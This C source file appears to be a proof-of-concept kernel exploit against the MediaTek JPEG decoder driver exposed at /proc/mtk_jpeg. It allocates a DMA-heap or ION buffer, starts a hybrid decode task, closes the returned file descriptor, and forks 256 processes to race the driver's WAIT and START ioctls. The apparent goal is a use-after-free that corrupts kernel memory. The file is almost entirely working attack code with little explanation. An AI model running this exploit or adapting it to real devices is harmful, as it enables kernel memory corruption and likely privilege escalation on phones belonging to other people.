//#define ION
#include <sys/ioctl.h>
#include <fcntl.h>
#include<sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/mman.h>
#include <linux/dma-heap.h>
#include <stdlib.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <errno.h>
#ifdef ION
#include "ion.h"
#endif
#define ION_BIT(nr) (1UL << (nr))

#define ION_HEAP(bit)			ION_BIT(bit)
#define NUM_PROCESS 256
struct JPEG_DEC_DRV_HYBRID_TASK {
	long timeout;
	int *hwid;
	int *index_buf_fd;
	unsigned int data[21];
};
/*struct JPEG_DEC_DRV_HYBRID_TASK {
	long timeout;
	int *hwid;
	//int *index_buf_fd;
	//unsigned int data[0];
};*/
struct JPEG_DEC_DRV_HYBRID_P_N_S {
	int hwid;
	int *progress_n_status;
};

static struct timeval start;
static inline void timer_start() {
    gettimeofday(&start, NULL);
}
static inline unsigned long timer_stop() {
    struct timeval stop;
    gettimeofday(&stop,NULL);
    return (stop.tv_sec - start.tv_sec) * 1000000 + stop.tv_usec - start.tv_usec;
}
#define JPEG_IOCTL_MAGIC        'x'

#define JPEG_DEC_IOCTL_HYBRID_START _IOWR(JPEG_IOCTL_MAGIC, 18, struct JPEG_DEC_DRV_HYBRID_TASK)
#define JPEG_DEC_IOCTL_HYBRID_WAIT _IOWR(JPEG_IOCTL_MAGIC, 19, struct JPEG_DEC_DRV_HYBRID_P_N_S)
#define JPEG_DEC_IOCTL_HYBRID_GET_PROGRESS_STATUS _IOWR(JPEG_IOCTL_MAGIC, 20, struct JPEG_DEC_DRV_HYBRID_P_N_S)

int main(int argc, char* argv[]) {
    int ret;
    struct JPEG_DEC_DRV_HYBRID_TASK start = { 0 };
    int jpegfd = open("/proc/mtk_jpeg",O_RDONLY);
    if(jpegfd == -1) {
        printf("open: %m\n");
        return 1;
    }
    #ifdef ION
    int dmafd = open("/dev/ion",O_RDONLY);
    struct ion_allocation_data ion_alloc_data;
    ion_alloc_data.len = 128;
	ion_alloc_data.flags = 1;
	ion_alloc_data.heap_id_mask = 1 << 0;
    ion_alloc_data.align = 4;
    if(ioctl(dmafd,ION_IOC_ALLOC,&ion_alloc_data) < 0)
    {
        printf("ion alloc: %m\n");
        exit(1);
    }
    struct ion_fd_data heap_data;
    heap_data.handle = ion_alloc_data.handle;
    if(ioctl(dmafd,ION_IOC_SHARE,&heap_data) < 0)
    {
        printf("ion share: %m\n");
        exit(1);
    }
    #else
    int dmafd = open("/dev/dma_heap/system",O_RDONLY);
    if(dmafd == -1) {
        printf("dma open: %m\n");
        return 1;
    }

    struct dma_heap_allocation_data heap_data = {
        .len = 128,
        .fd_flags = O_RDWR,
    };
    ret = ioctl(dmafd,DMA_HEAP_IOCTL_ALLOC,&heap_data);
    if( ret < 0 || heap_data.fd < 0)
    {
        printf("dma heap allocation fail: %d %d %m\n",ret,heap_data.fd);
        exit(1);
    }
    #endif
    close(dmafd);
    puts("Successful opens");
    start.timeout = 3000;
    int hwid = 41414141,index_buf_fd;
    start.hwid = &hwid;
    start.index_buf_fd = &index_buf_fd;
    // for(unsigned int i = 0; i < 256; i++) {
    //     printf("Trying %u\n",i);
    //     ret = ioctl(jpegfd,_IOWR(JPEG_IOCTL_MAGIC, 18, char[i]));
    //     printf("%u %m\n",i);
    // }
    // return 0;
    start.data[20] = 0;
    start.data[7] = 0;
    // start.data[20] = 256;
    // start.data[7] = heap_data.fd;
    ret = ioctl(jpegfd,JPEG_DEC_IOCTL_HYBRID_START,&start);
    printf("start ioctl: %d %m\nhwid %d ; fd %d\n",ret,hwid,index_buf_fd);
    // if(ret == -1)
    // {
    //     printf("sad no start\n");
    //     exit(1);
    // }
    void* map = mmap(NULL,0x2000, PROT_READ | PROT_WRITE,MAP_PRIVATE | MAP_ANONYMOUS,0,0);
    struct JPEG_DEC_DRV_HYBRID_P_N_S other = { 0 };
    struct JPEG_DEC_DRV_HYBRID_P_N_S * otherp = map;
    otherp->hwid = 0;
    otherp->progress_n_status = map + 0x1000;
    timer_start();
    //ret = ioctl(jpegfd,JPEG_DEC_IOCTL_HYBRID_WAIT,otherp);
    close(index_buf_fd);
    //unsigned long num_us = timer_stop();
    //printf("Took %lu us\n",num_us);
    int* shared_map = mmap(NULL,0x1000, PROT_READ | PROT_WRITE,MAP_SHARED | MAP_ANONYMOUS,0,0);
    pid_t pidtable[NUM_PROCESS];
    for(unsigned i = 0; i < NUM_PROCESS; i++) {
        if(pidtable[i] = fork())
            continue;
        //Child
        if(pidtable[i] == -1)
        {
            //NVM parent
            printf("fork: %m");
            exit(1);
        }
        //Busy wait until the parent is ready
        while(!*shared_map);
        timer_start();
        ret = ioctl(jpegfd,JPEG_DEC_IOCTL_HYBRID_WAIT,otherp);
        //Fast exit, which means we raced too early
        if(timer_stop() < 1000000)
            exit(0);
        //puts("exit");
        *shared_map = 0;
        if(ret < 0) {
            printf("Unexpected WAIT fail: %d %m",ret);
        }
        exit(0);
    }
    start.data[20] = 0;
    start.data[7] = 0;
    (*shared_map) = 1;
    //timer_start();
    ret = ioctl(jpegfd,JPEG_DEC_IOCTL_HYBRID_START,&start);
    if(ret == 0) {
        printf("Unexpectedly succeeded\n");
        return 0;
    }
    puts("Wait start");

    start.data[20] = 256;
    start.data[7] = heap_data.fd;
    // start.data[7] = 0;
    errno = 0;
    // while(timer_stop() < 2000000);
    // *shared_map = 1;
    while(*shared_map);
    //while(timer_stop() < num_us - 60000);
    ret = ioctl(jpegfd,JPEG_DEC_IOCTL_HYBRID_START,&start);
    printf("final start %d %m\n",ret);
    for(unsigned i = 0; i < NUM_PROCESS; i++)
        waitpid(pidtable[i],NULL,0);
    otherp->hwid = 0;
    //Try to cleanup from a failed attempt
    ioctl(jpegfd,JPEG_DEC_IOCTL_HYBRID_WAIT,otherp);
    //ret = ioctl(index_buf_fd,DMA_HEAP_IOCTL_ALLOC,0);
    //printf("ioctl on stale fd? %d %m\n",ret);
    close(index_buf_fd);
    close(jpegfd);
    puts("Exiting");

}
